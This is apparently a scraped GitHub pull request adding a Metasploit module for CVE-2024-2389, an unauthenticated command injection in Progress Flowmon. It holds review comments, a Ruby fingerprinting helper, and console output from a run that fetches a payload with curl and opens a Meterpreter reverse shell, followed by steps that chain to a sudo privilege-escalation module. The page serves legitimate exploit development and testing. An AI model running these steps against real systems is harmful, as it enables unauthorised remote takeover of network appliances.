Add module for Flowmon cmd injection CVE-2024-2389 #19150
documentation/modules/exploit/linux/http/progress_flowmon_unauth_cmd_injection.md
modules/exploits/linux/http/progress_flowmon_unauth_cmd_injection.rb
end | ||
|
||
# Use a regular expression to extract the version number from the response | ||
version = res.body.match(%r{/favicon\.ico\?v=([\d.]+)}) |
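Review bot: `res.body.match(%r{/favicon\.ico\?v=([\d.]+)})` on the last line returns nil whenever the favicon version tag is absent from the response, so any later read of the capture group (e.g. `version[1]`) raises NoMethodError instead of producing a clean "unknown" result; guard for nil right after the match before using the capture.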
Not a blocker: As a sanity question; is fingerprinting on homepage/auth/login and having fav.ico?v=.... enough to uniquely identify the application as flowmon - or are there other checks we can add to have a more rigorous check?
I've added a check to ensure the following html appears on the login page:
<title>Flowmon Web Interface</title>
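The two login-page checks discussed above (the favicon version tag and the page title), written as an added nil-safe fingerprint helper; this is example code, not the PR's module, and the sample HTML bodies are constructed.

```ruby
# Added example (not the PR's module code): fingerprint a Flowmon login page
# from its HTML body using the title check and the favicon version tag.
FLOWMON_TITLE = '<title>Flowmon Web Interface</title>'.freeze
FAVICON_VERSION_RE = %r{/favicon\.ico\?v=([\d.]+)}

# Returns { flowmon: true/false, version: "x.y.z" or nil }.
# match returns nil when the tag is absent, so the capture is read guarded.
def flowmon_fingerprint(body)
  return { flowmon: false, version: nil } if body.nil?

  is_flowmon = body.include?(FLOWMON_TITLE)
  m = body.match(FAVICON_VERSION_RE)
  { flowmon: is_flowmon, version: m && m[1] }
end

# Compare a dotted version string against a minimum, segment by segment and
# numerically, so "12.03.02" compares equal to "12.3.2". The minimum is
# supplied by the caller; no fixed-version threshold is assumed here.
def version_at_least?(version, minimum)
  return false if version.nil?

  Gem::Version.new(version) >= Gem::Version.new(minimum)
rescue ArgumentError
  false
end

# Constructed sample bodies (not captured from a real appliance).
SAMPLE_FLOWMON = <<~HTML
  <html><head><title>Flowmon Web Interface</title>
  <link rel="icon" href="/favicon.ico?v=12.03.02"></head><body></body></html>
HTML
SAMPLE_OTHER = '<html><head><title>Login</title></head><body></body></html>'.freeze

if __FILE__ == $PROGRAM_NAME
  fp = flowmon_fingerprint(SAMPLE_FLOWMON)
  puts "flowmon=#{fp[:flowmon]} version=#{fp[:version].inspect}"
end
```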
Thanks for the awesome module @DaveYesland. I pushed up a059700, hope you don't mind. I responded to the outstanding comments on the PR and made a couple of minor fixes. The PR is looking great and testing was as expected 👍
msf6 exploit(linux/http/progress_flowmon_unauth_cmd_injection) > options

Module options (exploit/linux/http/progress_flowmon_unauth_cmd_injection):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     192.168.2.26     yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT      443              yes       The target port (TCP)
   SSL        true             no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The URI path to Flowmon
   VHOST                       no        HTTP server virtual host

Payload options (cmd/linux/http/x64/meterpreter_reverse_tcp):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   FETCH_COMMAND       CURL             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
   FETCH_FILENAME      kCCuPRnPS        no        Name to use on remote system when storing payload; cannot contain spaces or slashes
   FETCH_SRVHOST       192.168.2.23     no        Local IP to use for serving payload
   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
   FETCH_URIPATH                        no        Local URI to use for serving payload
   FETCH_WRITABLE_DIR                   yes       Remote writable dir to store payload; cannot contain spaces
   LHOST               192.168.2.23     yes       The listen address (an interface may be specified)
   LPORT               4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic

View the full module info with the info, or info -d command.

msf6 exploit(linux/http/progress_flowmon_unauth_cmd_injection) > run

[*] Started reverse TCP handler on 192.168.2.23:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking if 192.168.2.26:443 can be exploited!
[*] Detected version: 12.03.02
[+] Version 12.03.02 is vulnerable.
[+] The target is vulnerable.
[*] Attempting to execute payload...
[*] Meterpreter session 1 opened (192.168.2.23:4444 -> 192.168.2.26:34294) at 2024-05-23 13:12:55 -0400

meterpreter > getuid
Server username: flowmon
meterpreter > sysinfo
Computer     : localhost.localdomain.localdomain
OS           : CentOS 7.9.2009 (Linux 3.10.0-1160.102.1.el7.flowmon.x86_64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > exit
This adds a module for:
CVE-2024-2389: Progress Flowmon Unauthenticated Command Injection
For more details on the vulnerability:
https://rhinosecuritylabs.com/research/cve-2024-2389-in-progress-flowmon/
https://support.kemptechnologies.com/hc/en-us/articles/24878235038733-CVE-2024-2389-Flowmon-critical-security-vulnerability
This application is available in cloud marketplaces:
Verification Steps
use exploits/linux/http/progress_flowmon_unauth_cmd_injection
set RHOSTS <target flowmon>
set RPORT <port flowmon is running on>
set LHOST <your host IP>
run
flowmon user. exploit/linux/local/progress_flowmon_sudo_privesc_2024 to gain root privileges.

Scenarios

Flowmon 12.2